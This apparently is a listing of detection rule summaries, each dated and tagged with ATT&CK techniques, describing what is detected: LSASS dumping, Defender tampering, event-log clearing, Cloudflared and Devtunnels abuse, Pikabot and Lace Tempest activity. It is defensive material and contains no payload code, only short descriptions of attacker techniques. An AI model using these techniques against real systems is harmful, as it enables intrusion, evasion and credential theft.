    Detects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.


    Read More
  • Antivirus Hacktool Detection

    calendar Nov 4, 2024 · attack.execution attack.t1204  ·
    Share on: twitter facebook linkedin copy

    Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.


    Read More
  • Antivirus Password Dumper Detection

    calendar Nov 4, 2024 · attack.credential-access attack.t1003 attack.t1558 attack.t1003.001 attack.t1003.002  ·
    Share on: twitter facebook linkedin copy

    Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.


    Read More
  • Antivirus Ransomware Detection

    calendar Nov 4, 2024 · attack.t1486  ·
    Share on: twitter facebook linkedin copy

    Detects a highly relevant Antivirus alert that reports ransomware. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.


    Read More
  • Antivirus Relevant File Paths Alerts

    calendar Nov 4, 2024 · attack.resource-development attack.t1588  ·
    Share on: twitter facebook linkedin copy

    Detects an Antivirus alert in a highly relevant file path or with a relevant file name. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.


    Read More
  • Antivirus Web Shell Detection

    calendar Nov 4, 2024 · attack.persistence attack.t1505.003  ·
    Share on: twitter facebook linkedin copy

    Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.


    Read More
  • Monero Crypto Coin Mining Pool Lookup

    calendar Nov 4, 2024 · attack.impact attack.t1496 attack.exfiltration attack.t1567  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious DNS queries to Monero mining pools


    Read More
  • .RDP File Created by Outlook Process

    calendar Nov 4, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of files with the ".rdp" extensions in the temporary directory that Outlook uses when opening attachments. This can be used to detect spear-phishing campaigns that use RDP files as attachments.


    Read More
  • Paste sharing url in reverse order

    calendar Nov 4, 2024  ·
    Share on: twitter facebook linkedin copy

    Paste sharing url in reverse order


    Read More
  • Potentially Suspicious Command Executed Via Run Dialog Box - Registry

    calendar Nov 1, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.


    Read More
  • .RDP File Created By Uncommon Application

    calendar Nov 1, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.


    Read More
  • Binary Proxy Execution Via Dotnet-Trace.EXE

    calendar Nov 1, 2024 · attack.execution attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects commandline arguments for executing a child process via dotnet-trace.exe


    Read More
  • Cloudflared Portable Execution

    calendar Nov 1, 2024 · attack.command-and-control attack.t1090.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the "cloudflared" binary from a non standard location.


    Read More
  • Cloudflared Quick Tunnel Execution

    calendar Nov 1, 2024 · attack.command-and-control attack.t1090.001  ·
    Share on: twitter facebook linkedin copy

    Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware.


    Read More
  • Cloudflared Tunnel Connections Cleanup

    calendar Nov 1, 2024 · attack.command-and-control attack.t1102 attack.t1090 attack.t1572  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.


    Read More
  • Cloudflared Tunnel Execution

    calendar Nov 1, 2024 · attack.command-and-control attack.t1102 attack.t1090 attack.t1572  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.


    Read More
  • Cloudflared Tunnels Related DNS Requests

    calendar Nov 1, 2024 · attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects DNS requests to Cloudflared tunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.


    Read More
  • Compressed File Creation Via Tar.EXE

    calendar Nov 1, 2024 · attack.collection attack.exfiltration attack.t1560 attack.t1560.001  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration.


    Read More
  • Compressed File Extraction Via Tar.EXE

    calendar Nov 1, 2024 · attack.collection attack.exfiltration attack.t1560 attack.t1560.001  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "tar.exe" in order to extract compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection.


    Read More
  • Cscript/Wscript Potentially Suspicious Child Process

    calendar Nov 1, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.


    Read More
  • Enable LM Hash Storage

    calendar Nov 1, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.


    Read More
  • Firewall Configuration Discovery Via Netsh.EXE

    calendar Nov 1, 2024 · attack.discovery attack.t1016  ·
    Share on: twitter facebook linkedin copy

    Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems


    Read More
  • Forfiles.EXE Child Process Masquerading

    calendar Nov 1, 2024 · attack.defense-evasion attack.t1036  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.


    Read More
  • HackTool - EDRSilencer Execution

    calendar Nov 1, 2024 · attack.defense-evasion attack.t1562  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.


    Read More
  • HackTool - EfsPotato Named Pipe Creation

    calendar Nov 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of a pipe name as used by the hack tool EfsPotato


    Read More
  • HackTool - NoFilter Execution

    calendar Nov 1, 2024 · attack.privilege-escalation attack.t1134 attack.t1134.001  ·
    Share on: twitter facebook linkedin copy

    Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators


    Read More
  • Potential Base64 Decoded From Images

    calendar Nov 1, 2024 · attack.defense-evasion attack.t1140  ·
    Share on: twitter facebook linkedin copy

    Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.


    Read More
  • Potential Direct Syscall of NtOpenProcess

    calendar Nov 1, 2024 · attack.execution attack.t1106  ·
    Share on: twitter facebook linkedin copy

    Detects potential calls to NtOpenProcess directly from NTDLL.


    Read More
  • Potential Persistence Via AppCompat RegisterAppRestart Layer

    calendar Nov 1, 2024 · attack.persistence attack.t1546.011  ·
    Share on: twitter facebook linkedin copy

    Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism.


    Read More
  • Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE

    calendar Nov 1, 2024 · attack.execution attack.t1059.003 attack.t1105 attack.t1218 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.


    Read More
  • Potential PowerShell Execution Policy Tampering

    calendar Nov 1, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution


    Read More
  • Potentially Suspicious AccessMask Requested From LSASS

    calendar Nov 1, 2024 · attack.credential-access car.2019-04-004 attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects process handle on LSASS process with certain access mask


    Read More
  • Potentially Suspicious Command Targeting Teams Sensitive Files

    calendar Nov 1, 2024 · attack.credential-access attack.t1528  ·
    Share on: twitter facebook linkedin copy

    Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive information about the logged in accounts.


    Read More
  • Potentially Suspicious Desktop Background Change Using Reg.EXE

    calendar Nov 1, 2024 · attack.defense-evasion attack.impact attack.t1112 attack.t1491.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.


    Read More
  • Potentially Suspicious Desktop Background Change Via Registry

    calendar Nov 1, 2024 · attack.defense-evasion attack.impact attack.t1112 attack.t1491.001  ·
    Share on: twitter facebook linkedin copy

    Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.


    Read More
  • PSScriptPolicyTest Creation By Uncommon Process

    calendar Nov 1, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.


    Read More
  • Renamed Cloudflared.EXE Execution

    calendar Nov 1, 2024 · attack.command-and-control attack.t1090.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a renamed "cloudflared" binary.


    Read More
  • Suspicious File Creation Activity From Fake Recycle.Bin Folder

    calendar Nov 1, 2024 · attack.persistence attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware


    Read More
  • Suspicious Greedy Compression Using Rar.EXE

    calendar Nov 1, 2024 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes


    Read More
  • Suspicious Process Execution From Fake Recycle.Bin Folder

    calendar Nov 1, 2024 · attack.persistence attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects process execution from a fake recycle bin folder, often used to avoid security solution.


    Read More
  • Suspicious Wordpad Outbound Connections

    calendar Nov 1, 2024 · attack.defense-evasion attack.command-and-control  ·
    Share on: twitter facebook linkedin copy

    Detects a network connection initiated by "wordpad.exe" over uncommon destination ports. This might indicate potential process injection activity from a beacon or similar mechanisms.


    Read More
  • System Information Discovery Using Ioreg

    calendar Nov 1, 2024 · attack.discovery attack.t1082  ·
    Share on: twitter facebook linkedin copy

    Detects the use of "ioreg" which will show I/O Kit registry information. This process is used for system information discovery. It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.


    Read More
  • System Information Discovery Using sw_vers

    calendar Nov 1, 2024 · attack.discovery attack.t1082  ·
    Share on: twitter facebook linkedin copy

    Detects the use of "sw_vers" for system information discovery


    Read More
  • System Information Discovery Using System_Profiler

    calendar Nov 1, 2024 · attack.discovery attack.defense-evasion attack.t1082 attack.t1497.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.


    Read More
  • System Integrity Protection (SIP) Disabled

    calendar Nov 1, 2024 · attack.discovery attack.t1518.001  ·
    Share on: twitter facebook linkedin copy

    Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.


    Read More
  • System Integrity Protection (SIP) Enumeration

    calendar Nov 1, 2024 · attack.discovery attack.t1518.001  ·
    Share on: twitter facebook linkedin copy

    Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.


    Read More
  • Tamper Windows Defender - PSClassic

    calendar Nov 1, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.


    Read More
  • Tamper Windows Defender - ScriptBlockLogging

    calendar Nov 1, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.


    Read More
  • Uncommon Child Process Of Conhost.EXE

    calendar Nov 1, 2024 · attack.defense-evasion attack.t1202  ·
    Share on: twitter facebook linkedin copy

    Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity.


    Read More
  • Uncommon File Created In Office Startup Folder

    calendar Nov 1, 2024 · attack.resource-development attack.t1587.001  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a file with an uncommon extension in an Office application startup folder


    Read More
  • Uncommon System Information Discovery Via Wmic.EXE

    calendar Nov 1, 2024 · attack.discovery attack.t1082  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. Some of these commands were used by Aurora Stealer in late 2022/early 2023.


    Read More
  • BITS Transfer Job Download From File Sharing Domains

    calendar Oct 25, 2024 · attack.defense-evasion attack.persistence attack.t1197  ·
    Share on: twitter facebook linkedin copy

    Detects BITS transfer job downloading files from a file sharing domain.


    Read More
  • Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder

    calendar Oct 25, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.


    Read More
  • New Connection Initiated To Potential Dead Drop Resolver Domain

    calendar Oct 25, 2024 · attack.command-and-control attack.t1102 attack.t1102.001  ·
    Share on: twitter facebook linkedin copy

    Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.


    Read More
  • Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE

    calendar Oct 25, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe


    Read More
  • Suspicious File Download From File Sharing Domain Via Curl.EXE

    calendar Oct 25, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious file download from file sharing domains using curl.exe


    Read More
  • Suspicious File Download From File Sharing Domain Via Wget.EXE

    calendar Oct 25, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious file downloads from file sharing domains using wget.exe


    Read More
  • Suspicious File Download From File Sharing Websites - File Stream

    calendar Oct 25, 2024 · attack.defense-evasion attack.s0139 attack.t1564.004  ·
    Share on: twitter facebook linkedin copy

    Detects the download of suspicious file type from a well-known file and paste sharing domain


    Read More
  • Unusual File Download From File Sharing Websites - File Stream

    calendar Oct 25, 2024 · attack.defense-evasion attack.s0139 attack.t1564.004  ·
    Share on: twitter facebook linkedin copy

    Detects the download of suspicious file type from a well-known file and paste sharing domain


    Read More
  • HackTool - Certipy Execution

    calendar Oct 8, 2024 · attack.discovery attack.credential-access attack.t1649  ·
    Share on: twitter facebook linkedin copy

    Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.


    Read More
  • Alternate PowerShell Hosts Pipe

    calendar Oct 8, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe


    Read More
  • Disable Windows Defender Functionalities Via Registry Keys

    calendar Oct 8, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects when attackers or tools disable Windows Defender functionalities via the Windows registry


    Read More
  • LSASS Process Memory Dump Files

    calendar Oct 8, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.


    Read More
  • Potentially Suspicious JWT Token Search Via CLI

    calendar Oct 6, 2024 · attack.credential-access attack.t1528  ·
    Share on: twitter facebook linkedin copy

    Detects possible search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG". This string is used as an anchor to look for the start of the JWT token used by microsoft office and similar apps.


    Read More
  • ETW Logging/Processing Option Disabled On IIS Server

    calendar Oct 6, 2024 · attack.defense-evasion attack.t1562.002 attack.t1505.004  ·
    Share on: twitter facebook linkedin copy

    Detects changes to of the IIS server configuration in order to disable/remove the ETW logging/processing option.


    Read More
  • HTTP Logging Disabled On IIS Server

    calendar Oct 6, 2024 · attack.defense-evasion attack.t1562.002 attack.t1505.004  ·
    Share on: twitter facebook linkedin copy

    Detects changes to of the IIS server configuration in order to disable HTTP logging for successful requests.


    Read More
  • New Module Module Added To IIS Server

    calendar Oct 6, 2024 · attack.defense-evasion attack.persistence attack.t1562.002 attack.t1505.004  ·
    Share on: twitter facebook linkedin copy

    Detects the addition of a new module to an IIS server.


    Read More
  • Previously Installed IIS Module Was Removed

    calendar Oct 6, 2024 · attack.defense-evasion attack.persistence attack.t1562.002 attack.t1505.004  ·
    Share on: twitter facebook linkedin copy

    Detects the removal of a previously installed IIS module.


    Read More
  • Add Potential Suspicious New Download Source To Winget

    calendar Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects usage of winget to add new potentially suspicious download sources


    Read More
  • Arbitrary File Download Via IMEWDBLD.EXE

    calendar Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects usage of "IMEWDBLD.exe" to download arbitrary files


    Read More
  • Arbitrary File Download Via MSEDGE_PROXY.EXE

    calendar Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects usage of "msedge_proxy.exe" to download arbitrary files


    Read More
  • Arbitrary File Download Via Squirrel.EXE

    calendar Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)


    Read More
  • Chromium Browser Instance Executed With Custom Extension

    calendar Oct 1, 2024 · attack.persistence attack.t1176  ·
    Share on: twitter facebook linkedin copy

    Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension


    Read More
  • Disable Internal Tools or Feature in Registry

    calendar Oct 1, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)


    Read More
  • DNS Query To Devtunnels Domain

    calendar Oct 1, 2024 · attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.


    Read More
  • DNS Query To Visual Studio Code Tunnels Domain

    calendar Oct 1, 2024 · attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.


    Read More
  • Eventlog Cleared

    calendar Oct 1, 2024 · attack.defense-evasion attack.t1070.001 car.2016-04-002  ·
    Share on: twitter facebook linkedin copy

    One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution


    Read More
  • Execution of Suspicious File Type Extension

    calendar Oct 1, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. This rule might require some initial baselining to align with some third party tooling in the user environment.


    Read More
  • F5 BIG-IP iControl Rest API Command Execution - Proxy

    calendar Oct 1, 2024 · attack.initial-access attack.t1190  ·
    Share on: twitter facebook linkedin copy

    Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP


    Read More
  • F5 BIG-IP iControl Rest API Command Execution - Webserver

    calendar Oct 1, 2024 · attack.execution attack.t1190  ·
    Share on: twitter facebook linkedin copy

    Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP


    Read More
  • HackTool - Generic Process Access

    calendar Oct 1, 2024 · attack.credential-access attack.t1003.001 attack.s0002  ·
    Share on: twitter facebook linkedin copy

    Detects process access requests from hacktool processes based on their default image name


    Read More
  • HackTool - WinPwn Execution

    calendar Oct 1, 2024 · attack.credential-access attack.defense-evasion attack.discovery attack.execution attack.privilege-escalation attack.t1046 attack.t1082 attack.t1106 attack.t1518 attack.t1548.002 attack.t1552.001 attack.t1555 attack.t1555.003  ·
    Share on: twitter facebook linkedin copy

    Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.


    Read More
  • HackTool - WinPwn Execution - ScriptBlock

    calendar Oct 1, 2024 · attack.credential-access attack.defense-evasion attack.discovery attack.execution attack.privilege-escalation attack.t1046 attack.t1082 attack.t1106 attack.t1518 attack.t1548.002 attack.t1552.001 attack.t1555 attack.t1555.003  ·
    Share on: twitter facebook linkedin copy

    Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.


    Read More
  • Important Windows Eventlog Cleared

    calendar Oct 1, 2024 · attack.defense-evasion attack.t1070.001 car.2016-04-002  ·
    Share on: twitter facebook linkedin copy

    Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution


    Read More
  • Lace Tempest Cobalt Strike Download

    calendar Oct 1, 2024 · attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team


    Read More
  • Lace Tempest File Indicators

    calendar Oct 1, 2024 · attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7


    Read More
  • Lace Tempest Malware Loader Execution

    calendar Oct 1, 2024 · attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team


    Read More
  • Lace Tempest PowerShell Evidence Eraser

    calendar Oct 1, 2024 · attack.execution attack.t1059.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team


    Read More
  • Lace Tempest PowerShell Launcher

    calendar Oct 1, 2024 · attack.execution attack.t1059.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team


    Read More
  • Load Of RstrtMgr.DLL By A Suspicious Process

    calendar Oct 1, 2024 · attack.impact attack.defense-evasion attack.t1486 attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.


    Read More
  • Load Of RstrtMgr.DLL By An Uncommon Process

    calendar Oct 1, 2024 · attack.impact attack.defense-evasion attack.t1486 attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.


    Read More
  • Malicious Driver Load

    calendar Oct 1, 2024 · attack.privilege-escalation attack.t1543.003 attack.t1068  ·
    Share on: twitter facebook linkedin copy

    Detects loading of known malicious drivers via their hash.


    Read More
  • Malicious Driver Load By Name

    calendar Oct 1, 2024 · attack.privilege-escalation attack.t1543.003 attack.t1068  ·
    Share on: twitter facebook linkedin copy

    Detects loading of known malicious drivers via the file name of the drivers.


    Read More
  • Network Connection Initiated To DevTunnels Domain

    calendar Oct 1, 2024 · attack.exfiltration attack.t1567.001  ·
    Share on: twitter facebook linkedin copy

    Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.


    Read More
  • Network Connection Initiated To Visual Studio Code Tunnels Domain

    calendar Oct 1, 2024 · attack.exfiltration attack.t1567.001  ·
    Share on: twitter facebook linkedin copy

    Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.


    Read More
  • New Netsh Helper DLL Registered From A Suspicious Location

    calendar Oct 1, 2024 · attack.persistence attack.t1546.007  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper


    Read More
  • Permission Misconfiguration Reconnaissance Via Findstr.EXE

    calendar Oct 1, 2024 · attack.credential-access attack.t1552.006  ·
    Share on: twitter facebook linkedin copy

    Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions.


    Read More
  • Portable Gpg.EXE Execution

    calendar Oct 1, 2024 · attack.impact attack.t1486  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.


    Read More
  • Potential CVE-2023-46214 Exploitation Attempt

    calendar Oct 1, 2024 · attack.lateral-movement attack.t1210 cve.2023-46214 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential exploitation of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing


    Read More
  • Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp

    calendar Oct 1, 2024 · attack.t1021.003 attack.lateral-movement  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.


    Read More
  • Potential File Download Via MS-AppInstaller Protocol Handler

    calendar Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache<RANDOM-8-CHAR-DIRECTORY>"


    Read More
  • Potential Linux Process Code Injection Via DD Utility

    calendar Oct 1, 2024 · attack.defense-evasion attack.t1055.009  ·
    Share on: twitter facebook linkedin copy

    Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.


    Read More
  • Potential Persistence Via Netsh Helper DLL - Registry

    calendar Oct 1, 2024 · attack.persistence attack.t1546.007  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper


    Read More
  • Potential Process Hollowing Activity

    calendar Oct 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055.012  ·
    Share on: twitter facebook linkedin copy

    Detects when a memory process image does not match the disk image, indicative of process hollowing.


    Read More
  • Potentially Suspicious Electron Application CommandLine

    calendar Oct 1, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.


    Read More
  • Potentially Suspicious GrantedAccess Flags On LSASS

    calendar Oct 1, 2024 · attack.credential-access attack.t1003.001 attack.s0002  ·
    Share on: twitter facebook linkedin copy

    Detects process access requests to LSASS process with potentially suspicious access flags


    Read More
  • PowerShell Execution With Potential Decryption Capabilities

    calendar Oct 1, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware.


    Read More
  • Process Proxy Execution Via Squirrel.EXE

    calendar Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)


    Read More
  • Remote Thread Creation Via PowerShell In Uncommon Target

    calendar Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218.011 attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a remote thread from a Powershell process in an uncommon target process


    Read More
  • Remote XSL Execution Via Msxsl.EXE

    calendar Oct 1, 2024 · attack.defense-evasion attack.t1220  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.


    Read More
  • Security Tools Keyword Lookup Via Findstr.EXE

